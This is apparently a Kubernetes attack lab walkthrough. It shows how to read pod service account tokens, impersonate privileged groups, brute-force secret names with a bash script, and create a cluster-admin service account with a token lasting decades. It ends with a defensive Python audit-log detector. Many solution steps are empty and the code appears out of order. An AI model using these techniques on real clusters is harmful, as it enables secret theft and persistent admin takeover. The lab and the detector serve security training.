Tokens are usually found at "/run/secrets/kubernetes.io/serviceaccount/token" and are readable by all users.
Solution
id # observe we are not root
ls -la /run/secrets/kubernetes.io/serviceaccount/token
ls -la /run/secrets/kubernetes.io/serviceaccount/..data/token # Can still read token
cat /run/secrets/kubernetes.io/serviceaccount/token
Ok we have the token, but how can we use it from inside the pod itself?
Hint
Find a way to import the "kubectl" tool in the Pod.
Solution
Run the following command on a node:
cp /usr/bin/kubectl .
python3 -m http.server
ip a # find ip of node
Enter tiller pod again:
Run the following commands in the pod:
Note: Replace <IP> with a valid IP where the python server is listening.
2. Impersonating Privileged Accounts
Let's create a user that has access to the "impersonate" verb and see how it can be used.
Solution
Create service account "impersonator":
Let's use the "impersonator" token with kubectl and:
Create token for "impersonator" SA and use it in kubectl:
Impersonate the "masters" group and a non-existent user:
Impersonate the "tiller" service account in the "kube-system" namespace:
Optional: Put the Kubernetes config which was moved from "/.kube/config" to "/.kube/config.bak" back to its previous location:
3. List & Get Secrets
Let's create 2 service accounts:
One has the privilege of listing all secrets in k8s
The other has get access on the secrets and list access on the pods and serviceaccounts APIs
Solution
Create service account "list-sec":
Create service account "read-sec":
Let's use the "list-sec" account to list and read all secrets.
Solution
Let's use the "read-sec" account to read the "default" secret.
Although the "read-sec" account can read any secret, it must know the name of the secret it is trying to read. Let's write a script (bash, python, etc.) and a set of wordlists to brute-force the available secret names.
Solution
We can use the list pods and list SAs to gain potential sensitive information for our wordlists:
Bash script "bruteforce_secret.sh":
Example command:
Read some of the identified secrets:
Optional: Put the Kubernetes config which was moved from "/.kube/config" to "/.kube/config.bak" back to its previous location:
4. Create Service Accounts Tokens
Let's create an administrative service account and generate a token that will last for years (>=10 years).
Hint
Every k8s cluster ships with the built-in "cluster-admin" ClusterRole by default.
kubectl --token=$RTOKEN -s https://localhost:6443 --insecure-skip-tls-verify=true get pods -A
kubectl --token=$RTOKEN -s https://localhost:6443 --insecure-skip-tls-verify=true get sa -A
#!/bin/bash
# Usage: bruteforce_secret.sh <http(s)://TARGET:PORT> <TOKEN> <NAMESPACE_FILE> <SECRET_FILE>
if [[ $# -ne 4 ]]; then
    echo -e "\n\tUSAGE: $0 <http(s)://TARGET:PORT> <TOKEN> <NAMESPACE_FILE> <SECRET_FILE>\n"
    exit 1
fi
TARGET=$1
TOKEN=$2
NAMESPACE_FILE=$3
SECRET_FILE=$4
result=""
# Try every namespace/secret-name pair; a non-empty response means the secret exists
for i in $(cat "$NAMESPACE_FILE"); do
    for j in $(cat "$SECRET_FILE"); do
        echo "Trying: $i - $j"
        x=$(./kubectl --token="$TOKEN" -s "$TARGET" --insecure-skip-tls-verify=true get secret "$j" -n "$i" 2>/dev/null)
        if [[ "$x" != "" ]]; then
            result="$result\nFound: $i - $j \n$x\n"
        fi
    done
done
echo -e "\n\nResults:\n$result"
kubectl create sa mal
kubectl create clusterrolebinding mal_sa --clusterrole=cluster-admin --serviceaccount=default:mal
kubectl create token mal --duration=999999999s
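Seen from the defender's side, the three exercises above (impersonation, secret-name guessing, long-lived service account tokens) each leave a distinct trace in the API server audit log. The following added example, which is not part of the original lab, triages constructed audit events for those traces; field names follow the audit.k8s.io/v1 Event schema, while the thresholds and sample events are assumptions.

```python
"""Triage Kubernetes audit log lines for the abuses covered on this page."""
import json
from collections import Counter

LONG_TOKEN_SECONDS = 86400   # assumed threshold: token expiry beyond one day is suspicious
SECRET_MISS_THRESHOLD = 3    # assumed: this many 404s on secrets by one user looks like guessing

def analyze(lines):
    """Return a list of (rule, principal, detail) findings from JSON audit events."""
    findings, secret_misses = [], Counter()
    for line in lines:
        ev = json.loads(line)
        user = ev.get("user", {}).get("username", "?")
        ref = ev.get("objectRef", {})
        imp = ev.get("impersonatedUser")
        # Rule 1: use of the impersonate verb is recorded as impersonatedUser on the event
        if imp:
            who, groups = imp.get("username", "?"), imp.get("groups", [])
            sev = "HIGH" if "system:masters" in groups else "MEDIUM"
            findings.append(("impersonation", user, f"{sev}: {user} acted as {who} groups={groups}"))
        # Rule 2: TokenRequest on a service account with an unusually long expiry
        if ev.get("verb") == "create" and ref.get("resource") == "serviceaccounts" and ref.get("subresource") == "token":
            exp = ev.get("requestObject", {}).get("spec", {}).get("expirationSeconds", 0)
            if exp > LONG_TOKEN_SECONDS:
                findings.append(("long-lived-token", user, f"{exp}s token for {ref.get('namespace')}/{ref.get('name')}"))
        # Rule 3: repeated misses on secrets by name (get without list invites guessing)
        if ev.get("verb") == "get" and ref.get("resource") == "secrets" and ev.get("responseStatus", {}).get("code") == 404:
            secret_misses[user] += 1
    for user, n in secret_misses.items():
        if n >= SECRET_MISS_THRESHOLD:
            findings.append(("secret-name-guessing", user, f"{n} 404s on secrets"))
    return findings

# Constructed sample events, not taken from a real cluster
SAMPLE = [
    json.dumps({"verb": "list", "user": {"username": "system:serviceaccount:default:impersonator"},
                "impersonatedUser": {"username": "ghost", "groups": ["system:masters"]},
                "objectRef": {"resource": "secrets"}, "responseStatus": {"code": 200}}),
    json.dumps({"verb": "create", "user": {"username": "kubernetes-admin"},
                "objectRef": {"resource": "serviceaccounts", "subresource": "token", "namespace": "default", "name": "mal"},
                "requestObject": {"kind": "TokenRequest", "spec": {"expirationSeconds": 999999999}},
                "responseStatus": {"code": 201}}),
] + [json.dumps({"verb": "get", "user": {"username": "system:serviceaccount:default:read-sec"},
                 "objectRef": {"resource": "secrets", "namespace": "kube-system", "name": n},
                 "responseStatus": {"code": 404}}) for n in ("db-pass", "admin", "token")]

if __name__ == "__main__":
    for rule, principal, detail in analyze(SAMPLE):
        print(f"[{rule}] {principal}: {detail}")
```

Rule 2 only fires if the audit policy records the request body (level RequestResponse or Request) for the serviceaccounts/token subresource; at Metadata level the expiry is not visible.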